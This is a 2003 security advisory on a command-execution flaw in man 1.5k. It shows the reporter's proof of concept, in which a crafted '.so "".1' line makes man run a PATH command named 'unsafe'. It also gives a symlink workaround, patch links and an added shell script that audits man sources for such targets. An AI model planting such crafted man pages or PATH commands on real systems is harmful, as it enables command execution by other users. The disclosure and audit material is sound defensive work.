Man Program Unsafe Return Value Command Execution Vulnerability

Published: 2003-03-11
Updated: 2003-03-18
Severity: High
Threat level: local administrator privileges
Error type: design error
Exploitation method: client mode
BUGTRAQ ID: 7066

Affected systems

Andries Brouwer man 1.5 k

Detailed description

The man program does not correctly handle certain types of input. A vulnerability exists in how man processes malformed file names; a local attacker can exploit it to execute arbitrary commands as another, higher-privileged user.

Test code

Jack Lloyd <lloyd@acm.jhu.edu> provided the following test method:

    $ cat innocent.1
    .so "".1
    $ cat '"".1' # the outer '' quotes are for the shell
    the user will never see this
    $ cat `which unsafe`
    #!/bin/sh
    echo "oops"
    id -a
    $ man ./innocent.1
    oops
    uid=528(lloyd) gid=100(users) groups=100(users)
    $

Solution

Temporary workaround: create a symbolic link that points /bin/unsafe to /bin/true.

Vendor patches:

Andries Brouwer man 1.5 k:
    Andries Brouwer Upgrade man-1.5l.tar.gz
    ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz

Andries Brouwer man 1.5 j:
    Andries Brouwer Upgrade man-1.5l.tar.gz
    ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz

Andries Brouwer man 1.5 i2:
    Andries Brouwer Upgrade man-1.5l.tar.gz
    ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz

Andries Brouwer man 1.5 i:
    Andries Brouwer Upgrade man-1.5l.tar.gz
    ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz

Andries Brouwer man 1.5 h1:
    Andries Brouwer Upgrade man-1.5l.tar.gz
    ftp://ftp.win.tue.nl/pub/linux-local/utils/man/man-1.5l.tar.gz

Related information

Reported by: Jack Lloyd <lloyd@acm.jhu.edu>

Related links:
http://online.securityfocus.com/advisories/5119
http://online.securityfocus.com/archive/1/314791
http://online.securityfocus.com/archive/1/314700
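
Added example, not part of the original advisory or of man's source: a shell audit helper for the .so request shown in the test method and for the "unsafe" command named in the workaround. The function names and the set of characters treated as ordinary in a .so target are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the advisory): audit helpers for the .so issue.

# Print "file:line:request" for every .so request in the given uncompressed
# man page sources whose target is empty or has a character outside
# [A-Za-z0-9._/+-]. That allowed set is an assumption made for this example.
scan_so_targets() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        awk '
            /^\.[ \t]*so[ \t]/ {
                target = $0
                sub(/^\.[ \t]*so[ \t]+/, "", target)   # drop the request name
                sub(/[ \t]+$/, "", target)             # drop trailing blanks
                if (target == "" || target ~ "[^A-Za-z0-9._/+-]")
                    printf "%s:%d:%s\n", FILENAME, NR, $0
            }' "$f"
    done
    return 0
}

# Print the path a command literally named "unsafe" resolves to and return 0;
# return 1 when no such command is on PATH. With the advisory's workaround in
# place, /bin/unsafe is a symlink to /bin/true.
find_unsafe_cmd() {
    command -v unsafe 2>/dev/null || return 1
}

# Run both checks on constructed sample pages (not real system files).
demo() {
    d=$(mktemp -d) || return 1
    printf '.so "".1\n' > "$d/innocent.1"     # constructed, as in the test method
    printf '.so man1/ls.1\n' > "$d/alias.1"   # constructed, ordinary include
    scan_so_targets "$d"/*.1
    find_unsafe_cmd || echo "no 'unsafe' command on PATH"
    rm -rf "$d"
}

# With arguments, scan those files; without, run the demo.
if [ "$#" -gt 0 ]; then
    scan_so_targets "$@"
    find_unsafe_cmd || echo "no 'unsafe' command on PATH"
else
    demo
fi
```

Pass uncompressed man page sources as arguments; compressed pages need to be decompressed first.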